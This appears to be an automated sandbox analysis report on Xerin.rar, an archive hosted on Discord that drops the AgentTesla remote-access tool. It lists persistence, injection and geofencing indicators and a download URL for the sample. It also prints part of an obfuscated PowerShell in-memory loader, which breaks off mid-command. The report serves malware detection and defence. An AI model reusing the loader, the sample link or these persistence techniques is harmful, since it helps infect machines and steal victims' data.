Analysis
-
max time kernel
60s -
max time network
63s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 15:19
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&
Resource
win10v2004-20240426-en
General
-
Target
https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 5692 created 616 5692 powershell.EXE winlogon.exe -
AgentTesla payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll family_agenttesla behavioral1/memory/5136-187-0x0000000008AC0000-0x0000000008CD4000-memory.dmp family_agenttesla -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$77Boy.exeXerinFuscatorFucker.exeXerinJunk.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation $77Boy.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation XerinFuscatorFucker.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation XerinJunk.exe -
Executes dropped EXE 8 IoCs
Processes:
XerinFuscatorFucker.exeXerinFuscatorFucker.exeXerinJunk.exe$77Boy.exeInstall.exeXerinFuscator.exeXerinFuscator.exe$77Boy.exepid process 2204 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5284 XerinJunk.exe 5564 $77Boy.exe 5628 Install.exe 5696 XerinFuscator.exe 3212 XerinFuscator.exe 5896 $77Boy.exe -
Loads dropped DLL 20 IoCs
Processes:
XerinFuscatorFucker.exeXerinFuscator.exeXerinFuscator.exepid process 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe 5696 XerinFuscator.exe 5696 XerinFuscator.exe 5696 XerinFuscator.exe 5696 XerinFuscator.exe 3212 XerinFuscator.exe 3212 XerinFuscator.exe 3212 XerinFuscator.exe 3212 XerinFuscator.exe -
Obfuscated with Agile.Net obfuscator 6 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\Users\Admin\Videos\Xerin\XerinFuscator.exe agile_net behavioral1/memory/5136-148-0x0000000007C20000-0x00000000080EE000-memory.dmp agile_net C:\Users\Admin\AppData\Local\Temp\40585F64.dll agile_net behavioral1/memory/5136-996-0x000000000B2A0000-0x000000000B3E2000-memory.dmp agile_net behavioral1/memory/5696-1042-0x0000000000890000-0x0000000000D5E000-memory.dmp agile_net behavioral1/memory/3212-1066-0x0000000000F20000-0x00000000013EE000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
$77Boy.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Boy = "C:\\Users\\Admin\\AppData\\Roaming\\$77Boy.exe" $77Boy.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 44 raw.githubusercontent.com 45 raw.githubusercontent.com 48 raw.githubusercontent.com 49 raw.githubusercontent.com -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77Boy svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 5692 set thread context of 5936 5692 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
msedge.exeXerinFuscator.exeXerinFuscatorFucker.exeXerinFuscator.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer XerinFuscator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion XerinFuscatorFucker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XerinFuscator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer XerinFuscator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion XerinFuscator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XerinFuscator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion XerinFuscator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XerinFuscatorFucker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer XerinFuscatorFucker.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE -
Modifies registry class 2 IoCs
Processes:
msedge.exeExplorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exe$77Boy.exepowershell.EXEdllhost.exeXerinFuscator.exepid process 3360 msedge.exe 3360 msedge.exe 2668 msedge.exe 2668 msedge.exe 4668 identity_helper.exe 4668 identity_helper.exe 820 msedge.exe 820 msedge.exe 5564 $77Boy.exe 5564 $77Boy.exe 5692 powershell.EXE 5692 powershell.EXE 5692 powershell.EXE 5692 powershell.EXE 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5564 $77Boy.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5696 XerinFuscator.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe 5936 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3372 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exe$77Boy.exeXerinFuscatorFucker.exepowershell.EXEdllhost.exeExplorer.EXEXerinFuscator.exeXerinFuscator.exesvchost.exedescription pid process Token: SeRestorePrivilege 2880 7zG.exe Token: 35 2880 7zG.exe Token: SeSecurityPrivilege 2880 7zG.exe Token: SeSecurityPrivilege 2880 7zG.exe Token: SeDebugPrivilege 5564 $77Boy.exe Token: SeDebugPrivilege 5136 XerinFuscatorFucker.exe Token: SeDebugPrivilege 5692 powershell.EXE Token: SeDebugPrivilege 5692 powershell.EXE Token: SeDebugPrivilege 5936 dllhost.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeDebugPrivilege 5696 XerinFuscator.exe Token: SeDebugPrivilege 3212 XerinFuscator.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe Token: SeSystemtimePrivilege 2240 svchost.exe Token: SeBackupPrivilege 2240 svchost.exe Token: SeRestorePrivilege 2240 svchost.exe Token: SeShutdownPrivilege 2240 svchost.exe Token: SeSystemEnvironmentPrivilege 2240 svchost.exe Token: SeUndockPrivilege 2240 svchost.exe Token: SeManageVolumePrivilege 2240 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
Processes:
msedge.exe7zG.exeXerinFuscatorFucker.exepid process 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2880 7zG.exe 5136 XerinFuscatorFucker.exe 5136 XerinFuscatorFucker.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe 2668 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
XerinFuscatorFucker.exeExplorer.EXEpid process 5136 XerinFuscatorFucker.exe 3372 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2668 wrote to memory of 2180 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 2180 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 4868 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3360 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3360 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe PID 2668 wrote to memory of 3692 2668 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5e110e22-97c8-4a1b-ab10-df6d2988fb30}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:esaBdpfYPqbR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CKXSsGOlSJFUgj,[Parameter(Position=1)][Type]$cUvJDpXaef)$bFgCcxbHdMc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'em'+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'ele'+'g'+'a'+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+'al'+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+'ut'+[Char](111)+'Cla'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$bFgCcxbHdMc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$CKXSsGOlSJFUgj).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$bFgCcxbHdMc.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'V'+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$cUvJDpXaef,$CKXSsGOlSJFUgj).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $bFgCcxbHdMc.CreateType();}$slMLYtAFhGnJz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+'d'+'s'+'');$wlPgQLaRsIPqwx=$slMLYtAFhGnJz.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+'roc'+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DOvOgDRjJhhdTOUNOad=esaBdpfYPqbR @([String])([IntPtr]);$XRoytiedwFHQOaQSkxigfQ=esaBdpfYPqbR 